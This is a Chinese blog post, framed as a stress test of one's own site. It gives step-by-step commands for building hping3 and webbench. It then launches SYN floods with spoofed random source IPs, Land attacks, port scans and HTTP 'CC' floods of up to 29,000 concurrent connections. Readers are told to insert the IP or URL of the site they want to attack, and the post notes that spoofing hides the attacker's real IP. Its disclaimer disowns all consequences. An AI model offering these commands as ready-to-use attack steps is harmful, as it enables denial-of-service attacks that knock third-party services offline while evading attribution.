搭建DDOS/CC网站压力测试环境配置

 

这几天折腾了下,空出了两台俄罗斯的vps,想着闲着也无聊没事做,不如来搞点不一样的吧,要不测试下自己的主站能抗多少压?这是个好主意,心动不如行动
这个环境对服务器配置要求较高,威力比CC攻击大多了,我叫他超威蓝猫

#科普
在计算机行业,拒绝服务(DoS)或分布式拒绝服务(DDoS)攻击是指不法分子企图让某机器或网络资源无法被预期的用户所使用。虽然执行DoS攻击的方式、动机和目标不一样,但通常包括设法临时性或无限期中断或暂停连接至互联网的主机提供服务。我在本文中将介绍如何在 Centos Linux下,使用hping3和伪造IP地址,执行拒绝服务攻击(即DoS)

I.教程步骤
每一行是一个命令,依次执行文字忽略

① yum -y install libpcap-devel tcl-devel
//安装依赖

② ln -sf /usr/include/pcap-bpf.h /usr/include/net/bpf.h
③ yum install git
//安装git

④ git clone https://github.com/antirez/hping.git
//下载

⑤ cd hping
//切换目录

⑥ ./configure
//配置

⑦ make
//编译

⑧ make strip
⑨ make install
//安装

II.攻击类型
自己喜欢哪个就选哪个执行,一般Syn Flood

①常规用法

hping3 192.168.1.1
②Land攻击

hping3 192.168.1.1 -S -a 192.168.1.1 -p 80
③DoS攻击(首选,数据包大小自己设置-s后面的)

hping3 192.168.1.1 -V -d 100 -S -w 64 -p 80 -s 1000 --flood --rand-source
④ICMP路由追踪

hping3 www.baidu.com -T -V -1
⑤端口扫描

hping3 192.168.1.1 -S -8 1-1024
III.参数详解
-c :发送数据包的个数
-d :每个数据包的大小
-w :tcp window 的大小
-p :对目标攻击的端口
-T 路由探测
--flood 利用主机最大性能发包,杀敌1000,自损800
–rand-source:使用随机的IP地址,目标机器看到一堆ip,不能定位你的实际IP;也可以使用-a或–spoof隐藏主机名
192.168.1.1记得换成你想攻击的服务器ip,嗯,有小伙伴问:退出ssh后第二次进入是不是又要全部执行一遍?答:不需要
只需执行

cd hping //切换到运行目录

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.1 //输入攻击的服务器,回车

请勿攻击正规网站,使用工具产生的后果与本人无关!请遵守网络规则!

DDOS方式测试了下我自己的网站,哦豁,量太大直接没了,但是这种不太方便呀,有没有更好的方法呢
这不,除了DDOS还有一个CC,我的网站还是一样动弹不了了哈哈

I.注意事项
这次我们用的是Webbench工具,发包形式,配置的话不用太高也别太低了,我的是1H512M随便测试下

II.安装教程
接下来请按照着步骤依次执行命令

i、安装编译工具
yum install ctags wget make apr* autoconf automake gcc gcc-c++
ii、下载webbench
wget http://shell.easion.site/tar.gz/cc/webbench-2020.06.09.tar.gz
iii、安装webbench
tar zxvf webbench-2020.06.09.tar.gz
#解压

cd webbench-1.5
#进入解压目录

make
#编译

mkdir /usr/local/man
#创建目录,否则安装失败

make install
#安装

III.压力测试
webbench -c 并发数 -t 运行测试时间 URL

例子:webbench -c 500 -t 600 http://127.0.0.1/

IV.参数说明
-c 500:表示同时产生500个并发连接

-t 600:表示持续600秒

问题: 有些小伙伴讲不小心退出ssh后或者第二次进入ssh需不需要再全部执行一篇?

答: 不需要!

第二次进入打开方法,只需执行2条命令

cd webbench-1.5
//进入运行目录

webbench -c 29000 -t 600 http://xxx.com/
//再次填想攻击的网站

备注:webbench最大可以模拟30000个并发连接,如果有网站备案请住手

在cc结束时网站也会恢复原来的状态,这个不和DDOS一样

提示:请正确使用工具,使用产生的后果与本人无关!请遵守网络规则!!

版权声明:
作者:admin
链接:https://www.shennong.date/?p=847
来源:北冥有鱼
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>
文章目录
关闭
目 录